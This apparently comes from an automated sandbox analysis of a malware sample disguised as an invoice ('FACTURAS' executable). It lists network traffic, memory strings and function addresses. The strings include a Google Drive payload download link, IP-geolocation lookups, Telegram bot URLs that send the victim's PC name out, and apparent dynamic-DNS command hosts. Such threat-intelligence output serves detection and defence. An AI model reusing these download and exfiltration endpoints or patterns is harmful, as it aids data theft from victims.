          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 26 Feb 2025 11:35:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: FACTURAS_1_250075.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: FACTURAS_1_250075.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003624E000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036197000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003623F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(m
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003624E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/L
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526626759.0000000005B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5s&
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=downloadA
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360DC000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036106000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(m
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65194
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65195
          Source: unknownNetwork traffic detected: HTTP traffic on port 65199 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65210 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65199
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65210
          Source: unknownNetwork traffic detected: HTTP traffic on port 65195 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65197 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65197
          Source: unknownNetwork traffic detected: HTTP traffic on port 65191 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65191
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65209
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65203
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65201
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65207
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65205
          Source: unknownNetwork traffic detected: HTTP traffic on port 65205 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65207 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65203 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65201 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65190 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65209 -> 443
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.10:65190 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:65191 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:65210 version: TLS 1.2
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_004063440_2_00406344
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040488F0_2_0040488F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_0040634412_2_00406344
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_0040488F12_2_0040488F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FC46812_2_057FC468
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FC73812_2_057FC738
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FC14712_2_057FC147
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F711812_2_057F7118
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FA08812_2_057FA088
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F537312_2_057F5373
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FD27812_2_057FD278
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FCCD812_2_057FCCD8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FCFAC12_2_057FCFAC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F69A012_2_057F69A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FE98812_2_057FE988
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FCA0812_2_057FCA08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F3E0912_2_057F3E09
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057FE97B12_2_057FE97B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F29EC12_2_057F29EC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F3B8312_2_057F3B83
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_057F3AA112_2_057F3AA1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ED4D012_2_380ED4D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E00F812_2_380E00F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ECE3012_2_380ECE30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EFB1012_2_380EFB10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E842212_2_380E8422
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E443F12_2_380E443F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E643612_2_380E6436
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E843012_2_380E8430
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E244F12_2_380E244F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E644012_2_380E6440
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E445012_2_380E4450
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC06F12_2_380EC06F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EA86812_2_380EA868
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E246012_2_380E2460
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EA87812_2_380EA878
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ED47612_2_380ED476
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC08012_2_380EC080
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EECA712_2_380EECA7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EECB812_2_380EECB8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E88B012_2_380E88B0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E88C012_2_380E88C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E68C012_2_380E68C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E68D012_2_380E68D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E48D012_2_380E48D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E00E712_2_380E00E7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E48E012_2_380E48E0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E28E012_2_380E28E0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EACF712_2_380EACF7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E28F012_2_380E28F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EAD0812_2_380EAD08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E8D0812_2_380E8D08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC50212_2_380EC502
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E8D1812_2_380E8D18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC51012_2_380EC510
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E6D5012_2_380E6D50
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E4D6212_2_380E4D62
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E6D6012_2_380E6D60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E2D7212_2_380E2D72
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E4D7012_2_380E4D70
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EF17012_2_380EF170
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EB18912_2_380EB189
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ED98912_2_380ED989
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E2D8012_2_380E2D80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EF18012_2_380EF180
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EB19812_2_380EB198
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ED99812_2_380ED998
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E919812_2_380E9198
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC99112_2_380EC991
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E91A812_2_380E91A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EC9A012_2_380EC9A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E51EF12_2_380E51EF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E71E112_2_380E71E1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E31FF12_2_380E31FF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E71F012_2_380E71F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E520012_2_380E5200
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EB61712_2_380EB617
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E321012_2_380E3210
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EB62812_2_380EB628
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E962912_2_380E9629
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380ECE2012_2_380ECE20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E963812_2_380E9638
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EF63812_2_380EF638
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EDE4F12_2_380EDE4F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EF64812_2_380EF648
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E766F12_2_380E766F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EDE6012_2_380EDE60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E567F12_2_380E567F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E1A7012_2_380E1A70
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E1A8012_2_380E1A80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E768012_2_380E7680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E369212_2_380E3692
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E569012_2_380E5690
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E36A012_2_380E36A0
